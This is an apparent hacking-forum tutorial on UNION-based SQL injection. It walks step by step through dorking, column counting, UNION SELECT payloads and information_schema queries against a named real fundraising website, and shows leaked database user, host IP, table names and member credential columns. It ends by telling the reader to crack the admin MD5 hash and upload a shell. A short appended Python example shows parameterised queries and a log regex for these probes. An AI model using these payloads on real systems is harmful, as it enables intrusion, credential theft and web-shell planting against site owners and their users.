
Assalamu alaikum

What we are going to learn today is what is called UNION Based SQL injection

 

First you want to find a vulnerable site using SQL dorks

like this

"inurl:index.php/id="

Step 1: Finding the vulnerability in a website

You will get many links like this

http://www.fundraisingnetwork.info/artcat-gift-fundraisers.php?id=22

 

so you put a single quote (') at the end

 

the link becomes

http://www.fundraisingnetwork.info/artcat-gift-fundraisers.php?id=22'

 

If you get an error, then the site is vulnerable. The link I provided is vulnerable.

 

Step 2: Finding the number of columns a website has

now we need to find the number of columns by adding at the end of the link

order by x-- (where 'x' is a random integer)

so the link becomes like this

http://www.fundraisingnetwork.info/artcat-gift-fundraisers.php?id=22 order by 1-- no error

http://www.fundraisingnetwork.info/artcat-gift-fundraisers.php?id=22 order by 2-- no error

http://www.fundraisingnetwork.info/artcat-gift-fundraisers.php?id=22 order by 8-- no error

and so on

We increase the number until we get the error

 

http://www.fundraisingnetwork.info/artcat-gift-fundraisers.php?id=22 order by 9--

 

Here we get the error, so now we know that the number of columns is 8

 

Step 3: Now that we've found the number of columns, it's time to execute the UNION SELECT statement

 

If we perform the UNION SELECT statement, we can get both users and admin information from their database

The point is that UNION SELECT returns our results with the information we need

If you want to find vulnerable columns, use UNION SELECT

If you want to find version of database, UNION SELECT

If you want admin information! use UNION SELECT

Alright, now that we know something about the UNION function, let's continue.

 

Take our website that has 11 columns and add a "UNION SELECT" statement.

Here's how our query will look:

 

http://www.fundraisingnetwork.info/artcat-gift-fundraisers.php?id=22 UNION SELECT 1,2,3,4,5,6,7,8--

 

This is what you would normally do if you use UNION function while SQL injecting a website

 

Focus on something like this, "index.php?id=-X UNION SELECT N--"

Where "X" is a random integer/string and "N" is the number of columns followed by two hyphens " -- " and another hyphen " - " beside "X"

 

http://www.fundraisingnetwork.info/artcat-gift-fundraisers.php?id=-22 UNION SELECT 1,2,3,4,5,6,7,8--

 

Step 4: Random numbers appear on screen, the next step

 

Here you'll find a bunch of numbers showing up on the screen.

These are known as "vulnerable columns" which states that those vulnerable columns have stored data inside them we need to extract.

 

In my given site you saw 5 and 7

You need to inject the number at the very top (always at the very top)

So, in this case we have number "5"

Now you might be asking, what can I do with a vulnerable column?

Well here's what you can get-- INFORMATION!

You need a lot of information to study from the website, here are a couple of examples.

 

Replace the vulnerable column, i.e. number 5, with a statement

 

group_concat(CHAR(32,58,32),user(),database(),version())

 

user() = find the user information

version() = find the version of the database

database() = find the current database

 

the link becomes

 

http://www.fundraisingnetwork.info/artcat-gift-fundraisers.php?id=-22 UNION SELECT 1,2,3,4,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),6,7,8--

 

tfnprimary2012@184.168.27.57 : tfnprimary2012 : 5.0.96-log

user()=tfnprimary2012@184.168.27.57

database()=tfnprimary2012

version()=5.0.96-log

 

So the database version is 5, which is good because it'll be easier to SQL inject the website.

Note:

Database version less than 5 "<5" = you need to guess tables (a bit hard work)

Database version greater than 5 ">5" = easy to inject with another function i.e group_concat

 

If you ever want to SQLi a website with version <5, then you can guess the tables from the list below

user
username
usernames
admin
admins
users
manager
account
accounts
member
login
logins
members
tbl_user
tbl_users
tbl_admin
tbl_admins
tbl_member
tbl_members
tbladmins
memberlist
tbluser
tblusers
tblmanager
tblmanagers
tblclients
tblservers
adminuser
usertbl
userstbl
admintbl
adminstbl
id
tuser
tusers
uid
userid
user_id
auid
adminpass
LoginID
FirstName
LastName
cms_user
cms_member
cms_users
cms_members
cms_admin
cms_admins
user_admin
user_info
user_list
user_login
user_logins
user_names
userrights
userinfo
userlist
webadmin
webadmins
Webmaster
Webuser
product
products
tblproducts
tblproduct
tbl_tbadmin
Adminlogin

 

We now have almost all the information about the website

Look closely here, we used a command "group_concat"

Here's its function:

Group_concat = Gets all the information at once, i.e. grouping it with the help of statements. Ex. group_concat(database())

Note: Group_concat won't work with versions less than 5

 

Step 5: Getting the table names

 

Alright, first let's look up some functions we're gonna use to extract table names (Important)

group_concat = grouping up data to a specific statement

table_name = tables names to be shown on screen

from = location of a specified statement

information_schema.tables = information in the database with table names in it

table_schema = tables in a database

database() = current database in the website

0x0a = a Hex code that creates a new line for organizing tables in an order

Now let's combine those functions and make up a query that will give us the table names

So, here's what our link will look like:

 

http://www.fundraisingnetwork.info/artcat-gift-fundraisers.php?id=-22 UNION SELECT 1,2,3,4,group_concat(table_name),6,7,8 from information_schema.tables where table_schema=database()--

 

In here, we replaced our vulnerable column with "group_concat(table_name)"

and then we added a

"from information_schema.tables where table_schema=database()--"

after the last column (excluding the two hyphens after 11)

Results on table names:

 

content_art_articles,content_art_authors,content_art_categories,content_art_listings_spon,content_art_rotations,core_categories,core_listings_free,core_listings_spon,membership_grouppermissions,membership_groups,membership_userpermissions,membership_userrecords,membership_users,salesleads,salesleads_comm,salesleads_infotypes,salesleads_list

 

Alright, now that we've found the tables, what you're gonna have to do is

find the tables where user/admin information is stored

In this case, "membership_users" seems to have admin information stored in it.

It's all about predicting and expecting what's behind every table you see

Okay, before proceeding to the next step, make sure you remember the statements we used in order to get the tables.

Replace and Add the following

Vulnerable Column = replace

"(table_name)" with "(column_name)"

&

"from information_schema.tables where table_schema=database()--" with

"from information_schema.columns where table_name=membership_users--"

 

If nothing happens then convert the 'membership_users' to HEX

using

http://www.swingnote.com/tools/texttohex.php

 

membership_users=6d656d626572736869705f7573657273

 

remember to add 0x before 6d656d626572736869705f7573657273

 

so the link becomes

 

http://www.fundraisingnetwork.info/artcat-gift-fundraisers.php?id=-22 UNION SELECT 1,2,3,4,group_concat(column_name),6,7,8 from information_schema.columns where table_name=0x6d656d626572736869705f7573657273--

 

the data from the table is as follows

 

memberID,passMD5,email,signupDate,groupID,isBanned,isApproved,custom1,custom2,custom3,custom4,comments

 

we need only

memberID,passMD5,email

 

Step 6: Getting Data from Columns

 

Alright, lets extract the information

Look closely at the syntax:

 

http://www.fundraisingnetwork.info/artcat-gift-fundraisers.php?id=-22 UNION SELECT 1,2,3,4,group_concat(memberID,0x3a,passMD5,0x3a,email,0x3a),6,7,8 from membership_users--

 

Keep this formula-like syntax in your mind whenever you want to extract data from columns

http://www.site.com/index.php?id=-X UNION SELECT N,group_concat("columnName",0x3a,"columnName",0x0a) from "tablename"--

 

Where "X" is a random integer/string preceded by a hyphen ( - ), "N" is the number/position of the column, "columnName" is the column you want to extract data from, "tablename" is the specific table you extract data from, and the two hyphens ( -- ) go at the end

 

column names = (memberID,passMD5,email)

separator = 0x3a (a hex for a colon " : ")

table name = membership_users

Once you execute that syntax, you get the username and password separated by a colon

 

Results after executing the syntax:

 

 


 

Bingo, we got the admin login details

 

now crack the MD5 hash by

http://www.md5decrypter.co.uk/

we found that


 

 

Now find the admin login and upload the shell and Bingo :)

 

Any questions relating to this tut, feel free to ask

 

Regards,

The High Roller
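The defensive side of the technique in the post above, as an added example that is not part of the original post: the `?id=` value pasted straight into the SQL text (the pattern the whole tutorial relies on) beside the parameterised form that closes it, plus a log check for the `order by N--`, `UNION SELECT` and `information_schema` probes the steps use. The SQLite schema, table contents and log lines are constructed for the demo and stand in for the site's real tables.

```python
"""Vulnerable vs. parameterised lookup, and a log check for UNION-injection probes."""
import re
import sqlite3
from urllib.parse import unquote

# Constructed toy schema: a products table behind ?id= and a members table
# with the same column names the post enumerated (values are placeholders).
SCHEMA = """
CREATE TABLE products(id INTEGER, name TEXT, price REAL);
INSERT INTO products VALUES (22, 'Gift basket', 9.5);
CREATE TABLE members(memberID TEXT, passMD5 TEXT, email TEXT);
INSERT INTO members VALUES ('admin', '<constructed-md5>', 'admin@example.test');
"""


def new_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def lookup_vulnerable(db, id_param):
    # The request parameter becomes part of the SQL text, so an input of
    # '-22 UNION SELECT ...' turns the product lookup into a second query
    # against any table the database user can read.
    sql = f"SELECT id, name, price FROM products WHERE id = {id_param}"
    return db.execute(sql).fetchall()


def lookup_hardened(db, id_param):
    # Parameter binding sends the value separately from the SQL text; the
    # same input is now just a string compared against the id column and
    # matches nothing. Keywords inside it are never parsed as SQL.
    sql = "SELECT id, name, price FROM products WHERE id = ?"
    return db.execute(sql, (id_param,)).fetchall()


# Probe patterns taken from the post's own steps; applied to URL-decoded
# request lines, case-insensitive, for access-log review or WAF rules.
PROBE = re.compile(r"(order\s+by\s+\d+\s*--|union\s+select|information_schema)", re.I)


def flag_requests(log_lines):
    """Return the request lines that carry one of the probe patterns."""
    return [line for line in log_lines if PROBE.search(unquote(line))]
```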

 
